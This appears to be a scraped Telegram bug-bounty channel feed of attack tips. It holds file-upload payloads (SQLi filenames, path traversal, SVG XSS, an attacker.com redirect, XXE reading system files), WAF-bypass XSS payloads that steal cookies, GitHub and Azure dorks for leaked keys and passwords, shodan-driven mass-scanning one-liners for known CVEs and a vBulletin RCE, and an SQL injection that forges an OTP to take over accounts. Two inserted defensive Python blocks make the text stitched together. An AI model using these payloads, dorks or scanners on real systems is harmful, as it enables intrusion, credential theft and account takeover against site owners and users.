CTF | Bug Bounty
🔐 Join Us for 🔐 🌐 CTF Resources 🌐 Bug Bounty Resources 🌐 CTF Challenges and More Join now: https://t.me/ctftm 👤 Owner: Team Matrix ᴅᴍᴄᴀ/ᴄᴏᴘʏʀɪɢʜᴛ ᴄʟᴀɪᴍ : @Dmcatm Admin Contact: @Teammatrixs_bot
🚨 XSS Hunting from WaybackURLS 🔍
Payload :
waybackurls target | grep -E '\bhttps?://\S+?=\S+' | grep -E '\.php|\.asp' | sort -u | sed 's/\(=[^&]*\)/=/g' | tee urls-xss.txt | sort -u -o urls-xss.txt && cat urls-xss.txt | kxss
#bugbountytips #bugbounty
🖥Chaining Vulnerabilities through File Upload🖥
SQLi⏳
'sleep(20).jpg
sleep(25)-- -.jpg
Path traversal⏳
../../etc/passwd/logo.png
../../../logo.png
XSS⏳
-> Set file name filename="svg onload=alert(document.domain)>" , filename="58832_300x300.jpg<svg onload=confirm()>"
-> Upload using .gif file
GIF89a/<svg/onload=alert(1)>/=alert(document.domain)//;
-> Upload using .svg file
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)"/>
-> <?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "w3.org/Graphics/SVG/1…"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
<script type="text/javascript">
alert("HolyBugx XSS");
</script>
</svg>
Open redirect ⏳
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<svg
onload="window.location='attacker.com'"
xmlns="http://www.w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
</svg>
XXE ⏳
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>
<svg width="500px" height="500px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
<text font-size="40" x="0" y="16">&xxe;</text>
</svg>
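The checks an upload handler needs against the chain above (filename-borne HTML and SQL, traversal in the name, SVGs with script or on* handlers, DOCTYPE/ENTITY declarations that enable XXE, and raster files whose bytes do not match their extension), as an added example that is not code from the post. The allowed extensions, the magic-byte table and the 64-byte sniff window are assumptions for illustration.

```python
import re
import xml.etree.ElementTree as ET

# Added example (not from the channel post): server-side upload validation.
# Extension list, magic bytes and the sniff window are illustrative assumptions.
SAFE_NAME = re.compile(r"[A-Za-z0-9_-]{1,64}\.(png|jpe?g|gif|svg)")
DTD_MARKUP = re.compile(r"<!(DOCTYPE|ENTITY)", re.IGNORECASE)
MAGIC = {"png": b"\x89PNG\r\n\x1a\n", "jpg": b"\xff\xd8\xff",
         "jpeg": b"\xff\xd8\xff", "gif": b"GIF8"}
BLOCKED_TAGS = {"script", "foreignobject", "use", "image", "a", "iframe"}

def safe_filename(name: str) -> bool:
    """Plain base name plus a known extension only: no quotes, '<', '/' or '..'."""
    return SAFE_NAME.fullmatch(name) is not None

def svg_is_clean(data: bytes) -> bool:
    """Accept only SVG with no DTD, no active elements and no on*/href attributes."""
    text = data.decode("utf-8", errors="replace")
    if DTD_MARKUP.search(text):          # refuse XXE-capable input before any parser sees it
        return False
    try:
        root = ET.fromstring(text)
    except ET.ParseError:
        return False
    for el in root.iter():
        if el.tag.split("}")[-1].lower() in BLOCKED_TAGS:
            return False
        for attr, val in el.attrib.items():
            local = attr.split("}")[-1].lower()   # strips the xlink namespace from href
            if local.startswith("on") or local == "href" or "javascript:" in val.lower():
                return False
    return True

def accept_upload(name: str, data: bytes) -> bool:
    """Combined decision a handler would make before storing the file."""
    if not safe_filename(name):
        return False
    ext = name.rsplit(".", 1)[1].lower()
    if ext == "svg":
        return svg_is_clean(data)
    # Raster: magic bytes must match the extension, and a GIF89a/<svg ...> polyglot
    # is caught by refusing markup in the header region (heuristic, not a full decode).
    return data.startswith(MAGIC[ext]) and b"<" not in data[:64]
```

Serving uploads with a fixed Content-Type and `Content-Disposition: attachment` from a separate origin closes the remaining cases this heuristic does not decode.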
====================
Join Our Telegram Channel
https://t.me/ctftm
🔥 Github-Dork
Happy Hunting
🔍 api_key
🔍 app_AWS_SECRET_ACCESS_KEY
🔍 app_secret
🔍 authoriztion
🔍 Ldap
🔍 aws_access_key_id
🔍 secret
🔍 bash_history
🔍 bashrc%20password
🔍 beanstalkd
🔍 client secre
🔍 composer
🔍 config
🔍 credentials
🔍 DB_PASSWORD
🔍 dotfiles
🔍 .env file
🔍 .exs file
🔍 extension:json mongolab.com
🔍 extension:pem%20private
🔍 extension:ppk private
🔍 extension:sql mysql dump
🔍 extension:yaml mongolab.com
🔍 .mlab.com password
🔍 mysql
🔍 npmrc%20_auth
🔍 passwd
🔍 passkey
🔍 rds.amazonaws.com password
🔍 s3cfg
🔍 send_key
🔍 token
🔍 filename:.bash_history
🔍 filename:.bash_profile aws
🔍 filename:.bashrc mailchimp
🔍 filename:CCCam.cfg
🔍 filename:config irc_pass
🔍 filename:config.php dbpasswd
🔍 filename:config.json auths
🔍 filename:config.php pass
🔍 filename:config.php dbpasswd
🔍 filename:connections.xml
🔍 filename:.cshrc
🔍 filename:.git-credentials
🔍 filename:.ftpconfig
🔍 filename:.history
🔍 filename:gitlab-recovery-codes.txt
🔍 filename:.htpasswd
🔍 filename:id_rsa
🔍 filename:.netrc password
🔍 FTP
🔍 filename:wp-config.php
🔍 git-credentials
🔍 github_token
🔍 HEROKU_API_KEY language:json
🔍 HEROKU_API_KEY language:shell
🔍 GITHUB_API_TOKEN language:shell
🔍 oauth
🔍 OTP
🔍 databases password
🔍 [WFClient] Password= extension:ica
🔍 xoxa_Jenkins
🔍 security_credentials
#bugbountytips #GitHub
====================
New XSS Fly Under Radar Cloudflare Bypass 🧱
Payload :
"><input%252bTyPE%25253d"hxlxmj"%252bSTyLe%25253d"display%25253anone%25253b"%252bonfocus%25253d"this.style.display%25253d'block'%25253b%252bthis.onfocus%25253dnull%25253b"%252boNMoUseOVer%25253d"this['onmo'%25252b'useover']%25253dnull%25253beval(String.fromCharCode(99,111,110,102,105,114,109,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41))%25253b"%252bAuToFOcus>
Credit: Halim
====================
Awesome One-liner Bug Bounty :
> A collection of awesome one-liner scripts especially for bug bounty.
This repository stores and houses various one-liner for bug bounty tips provided by me as well as contributed by the community. Your contributions and suggestions are heartily♥ welcome.
## Definitions
This section defines specific terms or placeholders that are used throughout one-line command/scripts.
- 1.1. "HOST" defines one hostname, (sub)domain, or IP address, e.g. replaced by internal.host, domain.tld, sub.domain.tld, or 127.0.0.1.
- 1.2. "HOSTS.txt" contains more than one entry matching criteria 1.1, one per line.
- 2.1. "URL" defines a full URL, e.g. replaced by http://domain.tld/path/page.html, or anything starting with the HTTP/HTTPS protocol.
- 2.2. "URLS.txt" contains more than one entry matching criteria 2.1, one per line.
- 3.1. "FILE.txt" or "FILE{N}.txt" means the files needed to run the command/script according to its context and needs.
- 4.1. "OUT.txt" or "OUT{N}.txt" means the file in which the result of the executed command is stored.
---
### Local File Inclusion
> @dwisiswant0
gau HOST | gf lfi | qsreplace "/etc/passwd" | xargs -I% -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'
### Open-redirect
> @dwisiswant0
export LHOST="URL"; gau $1 | gf redirect | qsreplace "$LHOST" | xargs -I % -P 25 sh -c 'curl -Is "%" 2>&1 | grep -q "Location: $LHOST" && echo "VULN! %"'
> @N3T_hunt3r
cat URLS.txt | gf url | tee url-redirect.txt && cat url-redirect.txt | parallel -j 10 curl --proxy http://127.0.0.1:8080 -sk > /dev/null
### XSS
> @cihanmehmet
gospider -S URLS.txt -c 10 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)" --other-source | grep -e "code-200" | awk '{print $5}'| grep "=" | qsreplace -a | dalfox pipe | tee OUT.txt
> @fanimalikhack
waybackurls HOST | gf xss | sed 's/=.*/=/' | sort -u | tee FILE.txt && cat FILE.txt | dalfox -b YOURS.xss.ht pipe > OUT.txt
> @oliverrickfors
cat HOSTS.txt | getJS | httpx --match-regex "addEventListener\((?:'|\")message(?:'|\")"
### Prototype Pollution
> @R0X4R
subfinder -d HOST -all -silent | httpx -silent -threads 300 | anew -q FILE.txt && sed 's/$/\/?__proto__[testparam]=exploit\//' FILE.txt | page-fetch -j 'window.testparam == "exploit"? "[VULNERABLE]" : "[NOT VULNERABLE]"' | sed "s/(//g" | sed "s/)//g" | sed "s/JS //g" | grep "VULNERABLE"
### CVE-2020-5902
> @Madrobot_
shodan search http.favicon.hash:-335242539 "3992" --fields ip_str,port --separator " " | awk '{print $1":"$2}' | while read host do ;do curl --silent --path-as-is --insecure "https://$host/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd" | grep -q root && \printf "$host \033[0;31mVulnerable\n" || printf "$host \033[0;32mNot Vulnerable\n";done
### CVE-2020-3452
> @vict0ni
while read LINE; do curl -s -k "https://$LINE/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../" | head | grep -q "Cisco" && echo -e "[${GREEN}VULNERABLE${NC}] $LINE" || echo -e "[${RED}NOT VULNERABLE${NC}] $LINE"; done < HOSTS.txt
### CVE-2022-0378
> @7h3h4ckv157
cat URLS.txt | while read h do; do curl -sk "$h/module/?module=admin%2Fmodules%2Fmanage&id=test%22+onmousemove%3dalert(1)+xx=%22test&from_url=x"|grep -qs "onmouse" && echo "$h: VULNERABLE"; done
### vBulletin 5.6.2 - 'widget_tabbedContainer_tab_panel' Remote Code Execution
> @Madrobot_
shodan search http.favicon.hash:-601665621 --fields ip_str,port --separator " " | awk '{print $1":"$2}' | while read host do ;do curl -s http://$host/ajax/render/widget_tabbedcontainer_tab_panel -d 'subWidgets[0][template]=widget_php&subWidgets[0][config][code]=phpinfo();' | grep -q phpinfo && \printf "$host \033[0;31mVulnerable\n" || printf "$host \033[0;32mNot Vulnerable\n";done;
### Find JavaScript Files
====================
Tip: extract IPs from a list of domains, and then you can fuzz or manually check them for SDE/BAC, ports, etc.
grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}'
#BugBounty #bugbountytips
SQL Injection to Account Takeover Manually :)
1. Enter a mobile number to log in and intercept the request
{"mobile_number":"8888888888"} >> 200
{"mobile_number":"8888888888'"} >> 500
{"mobile_number":"8888888888''"} >> 200
2. Final Query:
8888888888','1111','2024-04-03 21:20:55',1,'2024-04-03 21:20:55') --
2024-04-03 21:20:55 >> Exact time and date
1 >> attempts
You can see the 200 response.
Finally, you can log in with the 1110 OTP and get access to the victim's account :)
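Why the quote probes above answer 500 / 200 / 200, and the bound-parameter INSERT that makes the whole input plain data, as an added example that is not code from the post. The `otp_login` table, its columns and the fixed timestamp are constructed stand-ins for the OTP store the post implies.

```python
import secrets
import sqlite3

# Added example (not from the channel post): constructed in-memory OTP-login table.
TS = "2024-04-03 21:20:55"

def make_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE otp_login (mobile_number TEXT, otp TEXT, created_at TEXT, attempts INT)")
    return db

def request_otp_vulnerable(db: sqlite3.Connection, mobile: str) -> str:
    """String-built INSERT: a lone quote leaves an unterminated literal (SQL error,
    the 500 seen above); two quotes are one escaped quote, so the statement stays
    valid (the 200). The value is spliced into the statement, not bound."""
    otp = f"{secrets.randbelow(10000):04d}"
    db.execute("INSERT INTO otp_login VALUES ('" + mobile + "', '" + otp + "', '" + TS + "', 1)")
    return otp

def request_otp_safe(db: sqlite3.Connection, mobile: str) -> str:
    """Bound parameters: quotes, commas and '--' in mobile are just characters,
    so the OTP and the attempt counter always come from the server."""
    otp = f"{secrets.randbelow(10000):04d}"
    db.execute("INSERT INTO otp_login VALUES (?, ?, ?, 1)", (mobile, otp, TS))
    return otp

def probe_status(db: sqlite3.Connection, mobile: str) -> int:
    """HTTP status the vulnerable endpoint would return for a probe value."""
    try:
        request_otp_vulnerable(db, mobile)
        return 200
    except sqlite3.OperationalError:   # syntax error from the broken literal
        return 500

def stored_row(db: sqlite3.Connection, mobile: str):
    """(mobile_number, otp, attempts) as stored for an exact mobile value."""
    return db.execute("SELECT mobile_number, otp, attempts FROM otp_login WHERE mobile_number = ?",
                      (mobile,)).fetchone()
```

A 500 on a single quote and a 200 on a doubled quote is also the signal to alert on server-side: log the SQL error with the offending parameter name and rate-limit the endpoint.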
====================
(Hard filter + Cloudflare bypassed) Stored XSS leads to account takeover
Payload: xyz';"/></textarea><Img Src=OnXSS OnError=prompt(document.cookie)>
Tip: always play with the inputs' reflected values and tags, even when there is a WAF/Cloudflare.
#bugbountytip #bugbounty
Azure OSINT Google Dork List
- site:blob.core.windows.net "keyword"
- site:"blob.core.windows.net" and intext:"CONFIDENTIAL"
- site:*.core.windows.net intext:"TLP:RED"
- site:*.core.windows.net
- site:*.core.windows.net +blob
- site:*.core.windows.net +files -web -blob
- site:*.core.windows.net -web
- site:*.core.windows.net -web -blob -files
- site:*.core.windows.net inurl:dsts.dsts
- site:*.core.windows.net inurl:"term" -web
- site:*.blob.core.windows.net ext:xls | ext:xlsx (login | password | username)
- intext:connectionstring blob filetype:config
- intext:accountkey windows.net filetype:xml
- intext:storageaccountkey windows.net filetype:txt
Please Share Across Your Network, Someone Might Really Be Looking For This.
#Infosec #GHDB #Azure #bugbounty
New XSS Bypass Cloudflare WAF 🧱
Payload : %3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E